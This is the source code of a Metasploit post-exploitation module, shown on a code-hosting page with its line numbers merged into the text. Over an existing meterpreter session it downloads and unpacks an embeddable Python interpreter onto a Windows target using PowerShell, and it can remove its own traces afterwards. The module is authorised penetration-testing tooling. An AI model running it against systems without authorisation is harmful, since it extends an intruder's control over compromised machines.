Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/post/windows/manage/install_python.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Post::Common7include Msf::Post::File8include Msf::Post::Windows::Powershell910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Install Python for Windows',15'Description' => %q{16This module places an embeddable Python3 distribution onto the target file system,17granting pentesters access to a lightweight Python interpreter.18This module does not require administrative privileges or user interaction with19installation prompts.20},21'License' => MSF_LICENSE,22'Author' => ['Michael Long <bluesentinel[at]protonmail.com>'],23'Arch' => [ARCH_X86, ARCH_X64],24'Platform' => [ 'win' ],25'SessionTypes' => [ 'meterpreter'],26'References' => [27['URL', 'https://docs.python.org/3/using/windows.html#windows-embeddable'],28['URL', 'https://attack.mitre.org/techniques/T1064/']29],30'Notes' => {31'Stability' => [CRASH_SAFE],32'Reliability' => [],33'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]34}35)36)37register_options(38[39OptString.new('PYTHON_VERSION', [true, 'Python version to download', '3.8.2']),40OptString.new('PYTHON_URL', [true, 'URL to Python distributions', 'https://www.python.org/ftp/python/']),41OptString.new('FILE_PATH', [true, 'File path to store the python zip file; current directory by default', '.\\python-3.8.2-embed-win32.zip']),42OptBool.new('CLEANUP', [false, 'Remove module artifacts; set to true when ready to cleanup', false])43]44)45end4647def run48python_folder_path = File.basename(datastore['FILE_PATH'], File.extname(datastore['FILE_PATH']))49python_exe_path = "#{python_folder_path}\\python.exe"50python_url = "#{datastore['PYTHON_URL']}#{datastore['PYTHON_VERSION']}/python-#{datastore['PYTHON_VERSION']}-embed-win32.zip"5152# check if PowerShell is available53psh_path = '\\WindowsPowerShell\\v1.0\\powershell.exe'54unless file? "%WINDIR%\\System32#{psh_path}"55fail_with(Failure::NotVulnerable, 'No powershell available.')56end5758# Cleanup module artifacts59if datastore['CLEANUP']60print_status('Removing module artifacts')61script = 'Stop-Process -Name "python" -Force; '62script << "Remove-Item -Force #{datastore['FILE_PATH']}; "63script << "Remove-Item -Force -Recurse #{python_folder_path}; "64psh_exec(script)65return66end6768# download python embeddable zip file69script = '[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;'70script << "Invoke-WebRequest -Uri #{python_url} -OutFile #{datastore['FILE_PATH']}; "71print_status("Downloading Python embeddable zip from #{python_url}")72psh_exec(script)7374# confirm python zip file is present75unless file? datastore['FILE_PATH']76fail_with(Failure::NotFound, "Failed to download #{datastore['PYTHON_URL']}")77end7879# extract python embeddable zip file80script = "Expand-Archive #{datastore['FILE_PATH']}; "81print_status("Extracting Python zip file: #{datastore['FILE_PATH']}")82psh_exec(script)8384# confirm python.exe is present85unless file? python_exe_path86fail_with(Failure::NotFound, python_exe_path)87end8889# display location of python interpreter with example command90print_status('Ready to execute Python; spawn a command shell and enter:')91print_good("#{python_exe_path} -c \"print('Hello, world!')\"")92print_warning('Avoid using this python.exe interactively, as it will likely hang your terminal; use script files or 1 liners instead')93end94end959697